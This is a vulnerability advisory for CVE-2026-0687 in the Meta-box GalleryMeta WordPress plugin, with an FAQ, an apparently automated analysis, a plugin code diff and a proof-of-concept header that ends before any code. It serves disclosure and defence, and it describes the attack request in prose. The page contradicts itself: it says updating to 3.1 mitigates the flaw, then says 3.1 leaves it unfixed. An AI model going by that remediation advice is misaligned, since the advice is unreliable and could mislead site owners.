What is CVE-2026-0687?

CVE-2026-0687 is a medium severity vulnerability in the Meta-box GalleryMeta plugin for WordPress, which allows authenticated users with Author-level access and above to create and publish galleries without proper authorization checks.

How does this vulnerability work?

The vulnerability arises from a missing capability check in the registration of the ‘mb_gallery’ custom post type. Authenticated users can send a request to create galleries without verifying if they have the necessary permissions, which allows unauthorized gallery management.

Who is affected by CVE-2026-0687?

Any WordPress site using the Meta-box GalleryMeta plugin version 3.0.1 or earlier is affected. This includes sites where users have Author-level access or higher, as they can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Meta-box GalleryMeta plugin installed. If it is version 3.0.1 or earlier, your site is at risk and should be updated.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-0687 is 4.3, which indicates a medium severity level. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized content creation.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Meta-box GalleryMeta plugin to version 3.1 or later. Regularly check for updates and apply them promptly to ensure security.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the plugin until a secure version is available. Additionally, review user roles and permissions to limit access to Author-level users.

What does the proof of concept demonstrate?

The proof of concept illustrates how an authenticated attacker can exploit the vulnerability by sending a crafted request to create a gallery without proper authorization. It highlights the ease of exploitation given the lack of capability checks.

What are the potential risks of exploitation?

Successful exploitation could allow attackers to create and publish unauthorized galleries, potentially containing malicious content. This undermines the site’s content management and could lead to further security risks.

Is the vulnerability patched in version 3.1?

While version 3.1 of the plugin has been released, it does not address the core authorization flaw. It is essential to monitor for future updates that provide a complete fix.

How can I secure my WordPress site against similar vulnerabilities?

To secure your WordPress site, regularly update all plugins and themes, implement strong user role management, and conduct security audits. Consider using security plugins that monitor for vulnerabilities.

Where can I find more information about CVE-2026-0687?

More information about CVE-2026-0687 can be found on the National Vulnerability Database or through security advisories related to the Meta-box GalleryMeta plugin.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0687: Meta-box GalleryMeta <= 3.0.1 – Missing Authorization to Authenticated (Author+) Gallery Management (meta-box-gallerymeta)

CVE ID CVE-2026-0687

Plugin meta-box-gallerymeta

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 3.0.1

Patched Version 3.1

Disclosed January 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0687:
The Meta-box GalleryMeta WordPress plugin, versions up to and including 3.0.1, contains a missing authorization vulnerability in its custom post type registration. This allows authenticated users with Author-level permissions or higher to create and publish galleries without proper capability checks. The vulnerability has a CVSS score of 4.3, indicating medium severity.

The root cause is the plugin’s registration of the ‘mb_gallery’ custom post type without enforcing appropriate capability checks. In the file ‘meta-box-gallerymeta/include/posttype.php’, the function ‘mbgmnew_gallery_post’ defines the post type arguments. The ‘capability_type’ parameter is set to ‘post’ (line 34 in the diff), which inherits default WordPress post capabilities. However, the plugin does not implement any custom capability checks within its gallery management functions. The ‘save_post’ callback function in ‘gallerymetaboxes.php’ (lines 73-84) saves gallery metadata without verifying the user has the ‘edit_posts’ capability for this specific post type.

Exploitation requires an authenticated attacker with at least Author-level access. The attacker sends a POST request to the WordPress admin post editor for the ‘mb_gallery’ post type at ‘/wp-admin/post-new.php?post_type=mb_gallery’. They submit gallery data through the ‘mbgm_gallery_id’ parameter array. The plugin processes this request through the ‘save_post’ action hook registered for the ‘mb_gallery’ post type. No capability verification occurs before the ‘update_post_meta’ function executes, allowing unauthorized gallery creation and publication.

The patch in version 3.1 does not directly address the missing capability check. Atomic Edge research indicates the vulnerability remains unpatched in the provided code diff. The changes focus on security hardening: adding ABSPATH checks, improving output escaping, and updating text domains. The plugin version increments from 3.0.1 to 3.1, but the core authorization flaw persists. The ‘capability_type’ parameter remains ‘post’, and no additional capability checks are introduced in the gallery saving logic.

Successful exploitation allows attackers to create and publish unauthorized gallery content. This violates the intended permission model where only users with specific gallery management privileges should control gallery creation. Attackers can populate galleries with arbitrary images and videos, potentially hosting malicious content. The vulnerability enables privilege escalation within the content management system, as Authors gain gallery management capabilities reserved for higher-privileged roles.

Differential between vulnerable and patched code

Code Diff

--- a/meta-box-gallerymeta/gallerymetaboxes.php
+++ b/meta-box-gallerymeta/gallerymetaboxes.php
@@ -5,14 +5,17 @@
  * Description: Drag and drop multiple image upload by meta-box gallery for WordPress. Take full control over your WordPress site, build any gallery you can imagine – no programming knowledge required.
  * Author: Md. Shahinur Islam
  * Author URI: https://profiles.wordpress.org/shahinurislam
- * Version: 3.0.1
- * Text Domain: mbgm
- * Domain Path: /lang
+ * Version: 3.1
+ * Text Domain: meta-box-gallerymeta
  * Network: True
  * License: GPLv2
  * Requires at least: 5.8
  * Requires PHP: 7.4
 */
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 //--------------------- Create custom post type ---------------------------//
 define( 'MBGM_PLUGIN', __FILE__ );
 define( 'MBGM_PLUGIN_DIR', untrailingslashit( dirname( MBGM_PLUGIN ) ) );
@@ -52,16 +55,16 @@
     ?>
     <table class="form-table">
       <tr><td>
-        <a class="gallery-add button" href="#" data-uploader-title="<?php esc_html_e( 'Add image(s) to gallery', 'mbgm' );?>" data-uploader-button-text="<?php esc_html_e( 'Add image(s)', 'mbgm' );?>"><?php esc_html_e( 'Add image(s) and Video(s)', 'mbgm' );?></a>
+        <a class="gallery-add button" href="#" data-uploader-title="<?php echo esc_attr__( 'Add image(s) to gallery', 'meta-box-gallerymeta' );?>" data-uploader-button-text="<?php echo esc_attr__( 'Add image(s)', 'meta-box-gallerymeta' );?>"><?php echo esc_attr__( 'Add image(s) and Video(s)', 'meta-box-gallerymeta' );?></a>
         <ul id="gallery-metabox-list">
         <?php if ($ids) :
 			foreach ($ids as $key => $value) :
 			$image = wp_get_attachment_image_src($value); ?>
           <li>
-            <input type="hidden" name="mbgm_gallery_id[<?php echo $key; ?>]" value="<?php echo $value; ?>">
+          <input type="hidden" name="mbgm_gallery_id[<?php echo esc_attr( $key ); ?>]" value="<?php echo esc_attr( $value ); ?>">
             <img class="image-preview" src="<?php echo esc_url($image[0]); ?>">
-            <a class="change-image button button-small" href="#" data-uploader-title="<?php esc_html_e( 'Change image', 'mbgm' );?>" data-uploader-button-text="<?php esc_html_e( 'Change image', 'mbgm' );?>"><?php esc_html_e( 'Change image', 'mbgm' );?></a><br>
-            <small><a class="remove-image" href="#"><?php esc_html_e( 'Remove image', 'mbgm' );?></a></small>
+            <a class="change-image button button-small" href="#" data-uploader-title="<?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?>" data-uploader-button-text="<?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?>"><?php esc_html_e( 'Change image', 'meta-box-gallerymeta' );?></a><br>
+            <small><a class="remove-image" href="#"><?php esc_html_e( 'Remove image', 'meta-box-gallerymeta' );?></a></small>
           </li>
         <?php endforeach; endif; ?>
         </ul>
@@ -74,6 +77,15 @@
     if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) return;
     if(isset($_POST['mbgm_gallery_id'])) {
 		$array = array_map( 'sanitize_text_field', wp_unslash( $_POST['mbgm_gallery_id'] ) );
+
+    // sanitize captions if they exist
+    foreach ($array as $key => $image_id) {
+        $caption_key = "mbgm_caption_$image_id";
+        if (isset($_POST[$caption_key])) {
+            $array[$key.'_caption'] = wp_kses_post($_POST[$caption_key]);
+        }
+    }
+
 		update_post_meta($post_id, 'mbgm_gallery_id', $array);
     } else {
       delete_post_meta($post_id, 'mbgm_gallery_id');
@@ -101,7 +113,7 @@
               <?php	global $post;	$images = get_post_meta($post->ID, 'mbgm_gallery_id', true);
                 if (is_array($images) || is_object($images))	{  ?>

-                <div id="carousel_<?php echo $post->ID;?>" class="carousel slide carousel-fade">
+                <div id="carousel_<?php echo esc_attr( $post->ID );?>" class="carousel slide carousel-fade">
                   <div class="carousel-inner">
                       <?php
                         $countn = 1;
@@ -110,21 +122,21 @@
                         if(!empty($image_obj->mbgm_youtube_url)){
                       ?>
                         <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                          <div class="embed-responsive embed-responsive-16by9">
-                            <iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+                          <div class="embed-responsive embed-responsive-16by9">
+                            <iframe class="embed-responsive-item" src="<?php echo esc_url( 'https://www.youtube.com/embed/' . $image_obj->mbgm_youtube_url . '?rel=0' ); ?>" allowfullscreen></iframe>
                           </div>
                         </div>
                       <?php  }else{ ?>
                         <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                          <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo $image_obj->post_excerpt;?>">
+                          <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo esc_attr($image_obj->post_excerpt);?>">
                         </div>
                       <?php  } $countn++; } ?>
                   </div>
-                      <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="prev">
+                      <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo esc_attr($post->ID);?>" data-bs-slide="prev">
                         <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                         <span class="visually-hidden">Previous</span>
                       </button>
-                      <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="next">
+                      <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo esc_attr($post->ID);?>" data-bs-slide="next">
                         <span class="carousel-control-next-icon" aria-hidden="true"></span>
                         <span class="visually-hidden">Next</span>
                       </button>
@@ -145,15 +157,17 @@
     <ul class="pagination justify-content-end  text-right">
     <?php
     $big = 999999999; // need an unlikely integer
-      echo paginate_links( array(
-      'base' => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
-      'format' => '?paged=%#%',
-      'current' => max( 1, get_query_var('paged') ),
-      'total' => $metaboxesg_main_blog->max_num_pages,
-      'prev_text'          => __( '« Previous' ),
-      'next_text'          => __( 'Next »' ),
-      'type'               => 'plain'
-    ) );
+    echo wp_kses_post(
+        paginate_links( array(
+            'base'      => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
+            'format'    => '?paged=%#%',
+            'current'   => max( 1, get_query_var( 'paged' ) ),
+            'total'     => $metaboxesg_main_blog->max_num_pages,
+            'prev_text' => __( '« Previous','meta-box-gallerymeta' ),
+            'next_text' => __( 'Next »', 'meta-box-gallerymeta' ),
+            'type'      => 'plain',
+        ) )
+    );
     wp_reset_postdata();
     ?>
     </ul>
@@ -215,15 +229,17 @@
 			  <ul class="pagination justify-content-end  text-right">
 				<?php
 				$big = 999999999; // need an unlikely integer
-				 echo paginate_links( array(
+				 echo wp_kses_post(
+           paginate_links( array(
 					'base' => str_replace( $big, '%#%', get_pagenum_link( $big ) ),
 					'format' => '?paged=%#%',
 					'current' => max( 1, get_query_var('paged') ),
 					'total' => $metaboxesg_main_blog->max_num_pages,
-					'prev_text'          => __( '« Previous' ),
-					'next_text'          => __( 'Next »' ),
+					'prev_text'          => __( '« Previous','meta-box-gallerymeta' ),
+					'next_text'          => __( 'Next »','meta-box-gallerymeta' ),
 					'type'               => 'plain'
-				) );
+				) )
+        );
 				wp_reset_postdata();
 				?>
 			  </ul>
@@ -296,7 +312,7 @@
         <?php	global $post;	$images = get_post_meta($post->ID, 'mbgm_gallery_id', true);
           if (is_array($images) || is_object($images))	{  ?>

-          <div id="carousel_<?php echo $post->ID;?>" class="carousel slide carousel-fade">
+          <div id="carousel_<?php echo esc_attr($post->ID);?>" class="carousel slide carousel-fade">
             <div class="carousel-inner">
                 <?php
                   $countn = 1;
@@ -305,21 +321,22 @@
                   if(!empty($image_obj->mbgm_youtube_url)){
                 ?>
                   <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                    <div class="embed-responsive embed-responsive-16by9">
-                      <iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+                    <div class="embed-responsive embed-responsive-16by9">
+                      <iframe class="embed-responsive-item" src="<?php echo esc_url( 'https://www.youtube.com/embed/' . $image_obj->mbgm_youtube_url . '?rel=0' ); ?>" allowfullscreen></iframe>
+
                     </div>
                   </div>
                 <?php  }else{ ?>
-                  <div class="carousel-item <?php echo $countn == 1 ? 'active': ''; ?>">
-                    <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo $image_obj->post_excerpt;?>">
+                  <div class="carousel-item <?php echo esc_attr( ( 1 === $countn ) ? 'active' : '' );  ?>">
+                    <img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" class="d-block w-100" alt="<?php echo esc_attr( $image_obj->post_excerpt);?>">
                   </div>
                 <?php  } $countn++; } ?>
             </div>
-                <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="prev">
+                <button class="carousel-control-prev" type="button" data-bs-target="#carousel_<?php echo esc_attr( $post->ID);?>" data-bs-slide="prev">
                   <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                   <span class="visually-hidden">Previous</span>
                 </button>
-                <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo $post->ID;?>" data-bs-slide="next">
+                <button class="carousel-control-next" type="button" data-bs-target="#carousel_<?php echo esc_attr( $post->ID);?>" data-bs-slide="next">
                   <span class="carousel-control-next-icon" aria-hidden="true"></span>
                   <span class="visually-hidden">Next</span>
                 </button>
@@ -345,8 +362,9 @@
     if (get_option('mbgm_plugin_do_activation_redirect', false)) {
         delete_option('mbgm_plugin_do_activation_redirect');
         if(!isset($_GET['activate-multi']))
-        {
-            wp_redirect("edit.php?post_type=mb_gallery&page=mbg_settings");
+        {
+            wp_safe_redirect( admin_url( 'edit.php?post_type=mb_gallery&page=mbg_settings' ) );
+            exit;
         }
     }
 }
@@ -392,8 +410,8 @@
   <nav>
     <div class="mbg_wrapper">
       <div class="mbg_title">
-        <h1><?php esc_html_e( 'Welcome to Meta-box GalleryMeta.', 'mbgm' ); ?></h1>
-        <h4><?php esc_html_e( 'Copy and paste this shortcode here:', 'mbgm' );?></h4>
+        <h1><?php esc_html_e( 'Welcome to Meta-box GalleryMeta.', 'meta-box-gallerymeta' ); ?></h1>
+        <h4><?php esc_html_e( 'Copy and paste this shortcode here:', 'meta-box-gallerymeta' );?></h4>
       </div>
       <div class="mbg_switch-btn">
         <div class="mbg_switch-text">
@@ -423,11 +441,11 @@
           <p>Classic with Slider</p>
         </div>
         <div class="mbg_card-content">
-		     <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/gallery.jpg'?>" width="90%">
+		     <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'images/gallery.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4><?php esc_html_e( '[mbg-front-show]', 'mbgm' );?></h4>
+            <h4><?php esc_html_e( '[mbg-front-show]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -437,11 +455,11 @@
           <p>Mordan</p>
         </div>
         <div class="mbg_card-content">
-          <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/mordan.jpg'?>" width="90%">
+          <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'images/mordan.jpg'); ?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4><?php esc_html_e( '[mbg-front-mordan]', 'mbgm' );?></h4>
+            <h4><?php esc_html_e( '[mbg-front-mordan]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -451,11 +469,11 @@
           <p>Premium</p>
         </div>
         <div class="mbg_card-content">
-			  <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/primium.jpg'?>" width="90%">
+			  <img src="<?php echo esc_url( plugin_dir_url( __FILE__ ). 'images/primium.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
-            <h4 class="red"><?php esc_html_e( '[mbg-front-carousel]', 'mbgm' );?></h4>
+            <h4 class="red"><?php esc_html_e( '[mbg-front-carousel]', 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -465,12 +483,12 @@
           <p>Professional</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'images/single_gallery.jpg'?>" width="90%">
+			    <img src="<?php echo  esc_url(plugin_dir_url( __FILE__ ). 'images/single_gallery.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4 class="red"><?php esc_html_e( "[mbgm_gallery post_id='123']", 'mbgm' );?></h4>
+            <h4 class="red"><?php esc_html_e( "[mbgm_gallery post_id='123']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -488,12 +506,12 @@
           <p>Slider 1</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-1.jpg'?>" width="90%">
+			    <img src="<?php echo  esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-1.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='1']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='1']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -502,12 +520,12 @@
           <p>Slider 2</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-2.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-1/slider-2.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='2']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='2']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -516,12 +534,12 @@
           <p>Slider 3</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-3/slider-3.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-3/slider-3.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='3']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='3']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -530,12 +548,12 @@
           <p>Slider 4</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-4/slider-4.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-4/slider-4.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='4']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='4']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -545,12 +563,12 @@
           <p>Slider 5</p>
         </div>
         <div class="mbg_card-content">
-			    <img src="<?php echo plugin_dir_url( __FILE__ ). 'slider/slider-5/slider-5.jpg'?>" width="90%">
+			    <img src="<?php echo esc_url(plugin_dir_url( __FILE__ ). 'slider/slider-5/slider-5.jpg');?>" width="90%">
         </div>
         <div class="mbg_card-footer">
           <div class="mbg_footer-wrapper">
             <div class="mbg_icon-down"></div>
-            <h4><?php esc_html_e( "[mbgm_sliders style='5']", 'mbgm' );?></h4>
+            <h4><?php esc_html_e( "[mbgm_sliders style='5']", 'meta-box-gallerymeta' );?></h4>
           </div>
         </div>
       </div>
@@ -576,7 +594,7 @@
 // Add a "Custom Column" column to the Books post type
 add_filter('manage_mb_gallery_posts_columns', 'add_custom_column');
 function add_custom_column($columns) {
-    $columns['mbgmshortcode'] = __('MBGM Shortcode', 'mbgm');
+    $columns['mbgmshortcode'] = __('MBGM Shortcode', 'meta-box-gallerymeta');
     return $columns;
 }
 // Display custom data in the new column
--- a/meta-box-gallerymeta/include/enqueue.php
+++ b/meta-box-gallerymeta/include/enqueue.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 function mbgm_metabox_enqueue($hook) {
     if ( 'post.php' == $hook || 'post-new.php' == $hook ) {
       wp_enqueue_script('mbgm-admin-js', plugin_dir_url( __DIR__ ). 'js/gallery-metabox.js', array('jquery'),'1.0.0',true);
--- a/meta-box-gallerymeta/include/medianame.php
+++ b/meta-box-gallerymeta/include/medianame.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 /**
  * Add fields to media uploader
  *
--- a/meta-box-gallerymeta/include/posttype.php
+++ b/meta-box-gallerymeta/include/posttype.php
@@ -1,25 +1,28 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 add_action( 'init', 'mbgmnew_gallery_post' );
 function mbgmnew_gallery_post() {
 	$labels = array(
-		'name'               => _x( 'MB Gallery', 'post type general name', 'mbgm' ),
-		'singular_name'      => _x( 'MB Gallery', 'post type singular name', 'mbgm' ),
-		'menu_name'          => _x( 'MB Gallery', 'admin menu', 'mbgm' ),
-		'name_admin_bar'     => _x( 'MB Gallery', 'add new on admin bar', 'mbgm' ),
-		'add_new'            => _x( 'Add New', 'MB Gallery', 'mbgm' ),
-		'add_new_item'       => __( 'Add New MBG', 'mbgm' ),
-		'new_item'           => __( 'New MBG', 'mbgm' ),
-		'edit_item'          => __( 'Edit MBG', 'mbgm' ),
-		'view_item'          => __( 'View MBG', 'mbgm' ),
-		'all_items'          => __( 'Gallery', 'mbgm' ),
-		'search_items'       => __( 'Search MBG', 'mbgm' ),
-		'parent_item_colon'  => __( 'Parent MBG:', 'mbgm' ),
-		'not_found'          => __( 'No MBG found.', 'mbgm' ),
-		'not_found_in_trash' => __( 'No MBG found in Trash.', 'mbgm' )
+		'name'               => _x( 'MB Gallery', 'post type general name', 'meta-box-gallerymeta' ),
+		'singular_name'      => _x( 'MB Gallery', 'post type singular name', 'meta-box-gallerymeta' ),
+		'menu_name'          => _x( 'MB Gallery', 'admin menu', 'meta-box-gallerymeta' ),
+		'name_admin_bar'     => _x( 'MB Gallery', 'add new on admin bar', 'meta-box-gallerymeta' ),
+		'add_new'            => _x( 'Add New', 'MB Gallery', 'meta-box-gallerymeta' ),
+		'add_new_item'       => __( 'Add New MBG', 'meta-box-gallerymeta' ),
+		'new_item'           => __( 'New MBG', 'meta-box-gallerymeta' ),
+		'edit_item'          => __( 'Edit MBG', 'meta-box-gallerymeta' ),
+		'view_item'          => __( 'View MBG', 'meta-box-gallerymeta' ),
+		'all_items'          => __( 'Gallery', 'meta-box-gallerymeta' ),
+		'search_items'       => __( 'Search MBG', 'meta-box-gallerymeta' ),
+		'parent_item_colon'  => __( 'Parent MBG:', 'meta-box-gallerymeta' ),
+		'not_found'          => __( 'No MBG found.', 'meta-box-gallerymeta' ),
+		'not_found_in_trash' => __( 'No MBG found in Trash.', 'meta-box-gallerymeta' )
 	);
 	$args = array(
 		'labels'             => $labels,
-        'description'        => __( 'Description.', 'mbgm' ),
+        'description'        => __( 'Description.', 'meta-box-gallerymeta' ),
 		'public'             => true,
 		'publicly_queryable' => true,
 		'show_ui'            => true,
@@ -39,24 +42,24 @@
 add_action( 'init', 'mbgmnew_Slider_post' );
 function mbgmnew_Slider_post() {
 	$labels = array(
-		'name'               => _x( 'Sliders', 'post type general name', 'mbgm' ),
-		'singular_name'      => _x( 'Slider', 'post type singular name', 'mbgm' ),
-		'menu_name'          => _x( 'Slider', 'admin menu', 'mbgm' ),
-		'name_admin_bar'     => _x( 'Slider', 'add new on admin bar', 'mbgm' ),
-		'add_new'            => _x( 'Add New', 'Slider', 'mbgm' ),
-		'add_new_item'       => __( 'Add New Slider', 'mbgm' ),
-		'new_item'           => __( 'New Slider', 'mbgm' ),
-		'edit_item'          => __( 'Edit Slider', 'mbgm' ),
-		'view_item'          => __( 'View Slider', 'mbgm' ),
-		'all_items'          => __( 'All Sliders', 'mbgm' ),
-		'search_items'       => __( 'Search Slider', 'mbgm' ),
-		'parent_item_colon'  => __( 'Parent Slider:', 'mbgm' ),
-		'not_found'          => __( 'No Slider found.', 'mbgm' ),
-		'not_found_in_trash' => __( 'No Slider found in Trash.', 'mbgm' )
+		'name'               => _x( 'Sliders', 'post type general name', 'meta-box-gallerymeta' ),
+		'singular_name'      => _x( 'Slider', 'post type singular name', 'meta-box-gallerymeta' ),
+		'menu_name'          => _x( 'Slider', 'admin menu', 'meta-box-gallerymeta' ),
+		'name_admin_bar'     => _x( 'Slider', 'add new on admin bar', 'meta-box-gallerymeta' ),
+		'add_new'            => _x( 'Add New', 'Slider', 'meta-box-gallerymeta' ),
+		'add_new_item'       => __( 'Add New Slider', 'meta-box-gallerymeta' ),
+		'new_item'           => __( 'New Slider', 'meta-box-gallerymeta' ),
+		'edit_item'          => __( 'Edit Slider', 'meta-box-gallerymeta' ),
+		'view_item'          => __( 'View Slider', 'meta-box-gallerymeta' ),
+		'all_items'          => __( 'All Sliders', 'meta-box-gallerymeta' ),
+		'search_items'       => __( 'Search Slider', 'meta-box-gallerymeta' ),
+		'parent_item_colon'  => __( 'Parent Slider:', 'meta-box-gallerymeta' ),
+		'not_found'          => __( 'No Slider found.', 'meta-box-gallerymeta' ),
+		'not_found_in_trash' => __( 'No Slider found in Trash.', 'meta-box-gallerymeta' )
 	);
 	$args = array(
 		'labels'             => $labels,
-        'description'        => __( 'Description.', 'mbgm' ),
+        'description'        => __( 'Description.', 'meta-box-gallerymeta' ),
 		'public'             => true,
 		'publicly_queryable' => true,
 		'show_ui'            => true,
--- a/meta-box-gallerymeta/include/sliders.php
+++ b/meta-box-gallerymeta/include/sliders.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 function mbgm_single_sliders_shortcode($atts) {
     ob_start();
     //set attributies
@@ -46,7 +49,7 @@
             <div class="carousel-indicators">
                 <?php $countb = 0;?>
                 <?php while($mbgm_single_blog->have_posts()) : $mbgm_single_blog->the_post(); ?>
-                    <button type="button" data-bs-target="#carouselExampleDark" data-bs-slide-to="<?php echo $countb;?>" class="<?php echo $countb == 0? 'active': '' ?>" aria-current="true" aria-label="<?php echo $countb;?>"></button>
+                    <button type="button" data-bs-target="#carouselExampleDark" data-bs-slide-to="<?php echo esc_attr($countb);?>" class="<?php echo esc_attr($countb == 0? 'active': ''); ?>" aria-current="true" aria-label="<?php echo esc_attr($countb);?>"></button>
                 <?php $countb++;?>
                 <?php endwhile;?>
             </div>
--- a/meta-box-gallerymeta/templates/single-mb_gallery.php
+++ b/meta-box-gallerymeta/templates/single-mb_gallery.php
@@ -1,4 +1,8 @@
-<?php get_header();
+<?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
+get_header();
 // Tranzkart_Wp_Elements::$template = 'archive';
 // get_template_part( 'template-parts/page', 'title' );
 while(have_posts())	: the_post();
@@ -20,17 +24,17 @@
 		<div class="col-sm-4 mb-2 text-center img_details_main">
 			<a class="gallery-demo img-fluid" href="<?php echo esc_url(wp_get_attachment_url( $image ));?>">
 				<div class="embed-responsive embed-responsive-16by9">
-					<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+					<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo esc_attr($image_obj->mbgm_youtube_url);?>?rel=0" allowfullscreen></iframe>
 				</div>
 			</a>
-			<p class="img_details_title"><?php echo $image_obj->post_excerpt;?></p>
+			<p class="img_details_title"><?php echo esc_attr($image_obj->post_excerpt);?></p>
 		</div>
 		<?php  }else{ ?>
 		<div class="col-sm-4 mb-2 text-center img_details_main">
 			<a class="gallery-demo img-fluid" href="<?php echo esc_url(wp_get_attachment_url( $image ));?>">
-			<img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" alt="<?php echo $image_obj->post_excerpt;?>" class="img-thumbnail" />
+			<img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" alt="<?php echo esc_attr($image_obj->post_excerpt);?>" class="img-thumbnail" />
 			</a>
-			<p class="img_details_title"><?php echo $image_obj->post_excerpt;?></p>
+			<p class="img_details_title"><?php echo esc_attr($image_obj->post_excerpt);?></p>
 		</div>
 		<?php  }}} ?>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
